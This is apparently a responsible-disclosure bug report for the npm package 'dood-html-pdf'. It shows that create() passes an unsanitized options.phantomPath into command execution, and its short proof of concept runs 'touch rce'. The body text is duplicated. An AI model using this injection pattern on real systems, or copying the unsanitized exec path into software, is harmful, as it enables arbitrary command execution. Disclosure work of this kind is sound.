We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method create() fails to sanitize its parameter options.phantomPath and lets it flow into a sensitive command execution API.
Here is the proof of concept.
var fs = require('fs');
var htmltopdf = require('dood-html-pdf');
var html = fs.readFileSync('example.html', 'utf8');
var options = {
phantomPath: 'touch',
phantomArgs: ['rce'],
readLocalFile: true
};
var pdf = htmltopdf.create(html, options)
var exec = pdf.exec() // a file named rce will be created
Hi,
We would like to report a potential security vulnerability. The bug is introduced because the package-exported method
create()fails to sanitize its parameteroptions.phantomPathand lets it flow into a sensitive command execution API.Here is the proof of concept.
Please consider fixing it. thanks!